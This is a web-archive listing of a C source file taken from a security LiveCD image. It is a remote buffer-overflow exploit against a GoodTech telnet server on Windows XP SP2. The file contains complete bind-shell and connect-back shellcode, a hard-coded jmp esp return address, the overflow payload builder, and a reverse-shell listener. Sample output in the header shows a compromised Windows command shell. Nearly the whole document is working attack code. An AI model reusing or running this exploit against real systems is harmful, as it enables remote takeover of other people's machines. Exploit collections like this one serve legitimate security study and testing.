home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / telnet / goodtech / goodtech.c < prev   
Encoding:
C/C++ Source or Header  |  2005-03-30  |  11.2 KB  |  418 lines
  1. c[at]gmx[dot]net
  2. *
  3. *
  4. * [ cybertronic @ GoodTech ] $ gcc -o goodtech goodtech.c
  5. * [ cybertronic @ GoodTech ] $ ./goodtech
  6. *
  7. * Usage
  8. * -----
  9. * [ Bindshell ] ./goodtech <host>
  10. * [ Reverseshell ] ./goodtech <host> <connectback ip> <connectback port>
  11. *
  12. * [ cybertronic @ GoodTech ] $ ./goodtech 192.168.2.102 192.168.2.101 1337
  13. *
  14. * __ __ _
  15. * _______ __/ /_ ___ _____/ /__________ ____ (_)____
  16. * / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
  17. * / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
  18. * \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
  19. * /____/
  20. *
  21. * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
  22. * --[ connecting to 192.168.2.102:2380...done!
  23. * --[ jmp esp -> 0x7c951eed [ntdll.dll WinXP SP]2
  24. * --[ sending packet [ 10045 bytes ]...done!
  25. * --[ starting reverse handler [port: 1337]...done!
  26. * --[ incomming connection from: 192.168.2.102
  27. * --[ b0x pwned - h4ve phun
  28. * Microsoft Windows XP [Version 5.1.2600]
  29. * (C) Copyright 1985-2001 Microsoft Corp.
  30. *
  31. * C:\GoodTech>
  33. *
  34. */
  35.  
  36.  
  37. #include <stdio.h>
  38. #include <sys/socket.h>
  39. #include <netinet/in.h>
  40. #include <netdb.h>
  41.  
  42. /*
  43. *
  44. * definitions
  45. *
  46. */
  47.  
  48. #define PORT 2380
  49.  
  50. #define RED "\E[31m\E[1m"
  51. #define GREEN "\E[32m\E[1m"
  52. #define YELLOW "\E[33m\E[1m"
  53. #define BLUE "\E[34m\E[1m"
  54. #define NORMAL "\E[m"
  55.  
  56. /*
  57. *
  58. * prototypes
  59. *
  60. */
  61.  
  62. int exploit ( int s, unsigned long ip, unsigned short cbport, int 
  63. option );
  64. int shell ( int s, char* tip, unsigned short cbport );
  65.  
  66. void connect_to_bindshell ( char* tip, unsigned short bport );
  67. void header ();
  68. void wait ( int sec );
  69. void start_reverse_handler ( char* argv3 );
  70.  
  71. /*********************
  72. * Windows Shellcode *
  73. *********************/
  74.  
  75. /*
  76. * Type : bind shellcode
  77. * Length: 500 bytes
  78. * Port : 4444 / 0x115c
  79. *
  80. */
  81.  
  82. char bindshell[] =
  83. "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
  84. "\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  85. "\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
  86. "\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
  87. "\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
  88. "\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
  89. "\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
  90. "\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
  91. "\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
  92. "\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
  93. "\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
  94. "\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
  95. "\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
  96. "\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
  97. "\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
  98. "\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
  99. "\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
  100. "\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
  101. "\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
  102. "\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
  103. "\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
  104. "\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
  105. "\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
  106. "\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
  107. "\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
  108. "\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
  109. "\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
  110. "\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
  111. "\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
  112. "\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
  113. "\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
  114. "\x80\x2f\xa2\x04";
  115.  
  116. /*
  117. * Type : connect back shellcode
  118. * Length: 316 bytes
  119. * CBIP : reverseshell[111] ( ^ 0x99999999 )
  120. * CBPort: reverseshell[118] ( ^ 0x9999 )
  121. *
  122. */
  123.  
  124. unsigned char reverseshell[] =
  125. "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
  126. "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
  127. "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
  128. "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
  129. "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
  130. "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
  131. "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
  132. "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
  133. "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
  134. "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
  135. "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
  136. "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
  137. "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
  138. "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
  139. "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
  140. "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
  141. "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
  142. "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
  143. "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
  144. "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
  145.  
  146. /*
  147. *
  148. * functions
  149. *
  150. */
  151.  
  152. int
  153. exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int 
  154. option )
  155. {
  156. char buffer[10046];
  157.  
  158. printf ( "--[ jmp esp -> 0x7c951eed [ntdll.dll WinXP SP]2\n" );
  159. if ( option == 0 )
  160. {
  161. memcpy ( &reverseshell[111], &xoredip, 4);
  162. memcpy ( &reverseshell[118], &xoredcbport, 2);
  163.  
  164. bzero ( &buffer, sizeof ( buffer ) );
  165. memset ( buffer, 0x41, 10032 );
  166. memcpy ( buffer + 46, "\x81\xc4\x54\xf2\xff\xff", 6 );
  167. memcpy ( buffer + 52, reverseshell, sizeof ( reverseshell ) - 1 );
  168. strcat ( buffer, "\xed\x1e\x95\x7c" ); // jmp esp ntdll.dll win xp 
  169. sp2
  170. strncat ( buffer, "\xe9\xf0\xd8\xff\xff", 5 ); // jmp -10000
  171. strcat ( buffer, "\r\n\r\n");
  172. }
  173. else
  174. {
  175. bzero ( &buffer, sizeof ( buffer ) );
  176. memset ( buffer, 0x41, 10032 );
  177. memcpy ( buffer + 46, "\x81\xc4\x54\xf2\xff\xff", 6 );
  178. memcpy ( buffer + 52, bindshell, sizeof ( bindshell ) - 1 );
  179. strcat ( buffer, "\xed\x1e\x95\x7c" ); // jmp esp ntdll.dll win xp 
  180. sp2
  181. strncat ( buffer, "\xe9\xf0\xd8\xff\xff", 5 ); // jmp -10000
  182. strcat ( buffer, "\r\n\r\n");
  183. }
  184.  
  185. printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
  186.  
  187. if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
  188. {
  189. printf ( RED "failed!\n" NORMAL);
  190. return ( 1 );
  191. }
  192. printf ( YELLOW "done!\n" NORMAL);
  193. sleep ( 1 );
  194. close ( s );
  195. return ( 0 );
  196. }
  197.  
  198. int
  199. shell ( int s, char* tip, unsigned short cbport )
  200. {
  201. int n;
  202. char buffer[2048];
  203. fd_set fd_read;
  204.  
  205. printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW 
  206. "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" 
  207. NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" 
  208. NORMAL "\n" );
  209.  
  210. FD_ZERO ( &fd_read );
  211. FD_SET ( s, &fd_read );
  212. FD_SET ( 0, &fd_read );
  213.  
  214. while ( 1 )
  215. {
  216. FD_SET ( s, &fd_read );
  217. FD_SET ( 0, &fd_read );
  218.  
  219. if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
  220. break;
  221. if ( FD_ISSET ( s, &fd_read ) )
  222. {
  223. if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
  224. {
  225. printf ( "bye bye...\n" );
  226. return;
  227. }
  228. if ( write ( 1, buffer, n ) < 0 )
  229. {
  230. printf ( "bye bye...\n" );
  231. return;
  232. }
  233. }
  234. if ( FD_ISSET ( 0, &fd_read ) )
  235. {
  236. if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
  237. {
  238. printf ( "bye bye...\n" );
  239. return;
  240. }
  241. if ( send ( s, buffer, n, 0 ) < 0 )
  242. {
  243. printf ( "bye bye...\n" );
  244. return;
  245. }
  246. }
  247. usleep(10);
  248. }
  249. }
  250.  
  251. void
  252. connect_to_bindshell ( char* tip, unsigned short bport )
  253. {
  254. int s;
  255. int sec = 5; // change this for fast targets
  256. struct sockaddr_in remote_addr;
  257. struct hostent *host_addr;
  258.  
  259. if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
  260. {
  261. fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
  262. exit ( 1 );
  263. }
  264.  
  265. remote_addr.sin_family = AF_INET;
  266. remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  267. remote_addr.sin_port = htons ( bport );
  268.  
  269. if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
  270. {
  271. printf ( "socket failed!\n" );
  272. exit ( 1 );
  273. }
  274. printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", 
  275. sec, tip, bport );
  276. wait ( sec );
  277. printf ( "--[ connecting to %s:%u...", tip, bport );
  278. if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct 
  279. sockaddr ) ) == -1 )
  280. {
  281. printf ( RED "failed!\n" NORMAL);
  282. exit ( 1 );
  283. }
  284. printf ( YELLOW "done!\n" NORMAL);
  285. shell ( s, tip, bport );
  286. }
  287.  
  288. void
  289. header ()
  290. {
  291. printf ( " __ __ _ \n" );
  292. printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
  293. printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
  294. printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
  295. printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
  296. printf ( " /____/ \n\n" );
  297. printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
  298. }
  299.  
  300. void
  301. start_reverse_handler ( char* argv3 )
  302. {
  303. int s1, s2;
  304. unsigned short cbport;
  305. struct sockaddr_in cliaddr, servaddr;
  306. socklen_t clilen = sizeof ( cliaddr );
  307.  
  308. sscanf ( argv3, "%u", &cbport );
  309.  
  310. bzero ( &servaddr, sizeof ( servaddr ) );
  311. servaddr.sin_family = AF_INET;
  312. servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
  313. servaddr.sin_port = htons ( cbport );
  314.  
  315. printf ( "--[ starting reverse handler [port: %u]...", cbport );
  316. if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
  317. {
  318. printf ( "socket failed!\n" );
  319. exit ( 1 );
  320. }
  321. bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
  322. if ( listen ( s1, 1 ) == -1 )
  323. {
  324. printf ( "listen failed!\n" );
  325. exit ( 1 );
  326. }
  327. printf ( YELLOW "done!\n" NORMAL);
  328. if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 
  329. 0 )
  330. {
  331. printf ( "accept failed!\n" );
  332. exit ( 1 );
  333. }
  334. close ( s1 );
  335. printf ( "--[ incomming connection from:\t" YELLOW " %s\n" NORMAL, 
  336. inet_ntoa ( cliaddr.sin_addr ) );
  337. shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
  338. close ( s2 );
  339. }
  340.  
  341. void
  342. wait ( int sec )
  343. {
  344. sleep ( sec );
  345. }
  346.  
  347. int
  348. main ( int argc, char* argv[] )
  349. {
  350.  
  351. int s;
  352. unsigned long xoredip;
  353. unsigned short xoredcbport;
  354. struct sockaddr_in remote_addr;
  355. struct hostent *host_addr;
  356.  
  357. if ( argc != 2 )
  358. if ( argc != 4 )
  359. {
  360. fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ 
  361. Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", 
  362. argv[0], argv[0] );
  363. exit ( 1 );
  364. }
  365.  
  366. if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
  367. {
  368. fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
  369. exit ( 1 );
  370. }
  371. remote_addr.sin_family = AF_INET;
  372. remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  373. remote_addr.sin_port = htons ( PORT );
  374.  
  375. system ( "clear" );
  376. header ();
  377.  
  378. if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
  379. {
  380. printf ( "socket failed!\n" );
  381. exit ( 1 );
  382. }
  383.  
  384. printf ( "--[ connecting to %s:%u...", argv[1], PORT );
  385. if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct 
  386. sockaddr ) ) == -1 )
  387. {
  388. printf ( "failed!\n" );
  389. exit ( 1 );
  390. }
  391. printf ( YELLOW "done!\n" NORMAL);
  392.  
  393. if ( argc == 4 )
  394. {
  395. xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
  396. xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
  397. if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
  398. {
  399. printf ( "exploitation FAILED!\n" );
  400. exit ( 1 );
  401. }
  402. start_reverse_handler ( argv[3] );
  403. }
  404. else
  405. {
  406. if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 
  407. ) == 1 )
  408. {
  409. printf ( "exploitation FAILED!\n" );
  410. exit ( 1 );
  411. }
  412. connect_to_bindshell ( argv[1], 4444 );
  413. }
  414. }
  415.  
  416.  
  417.  
  418.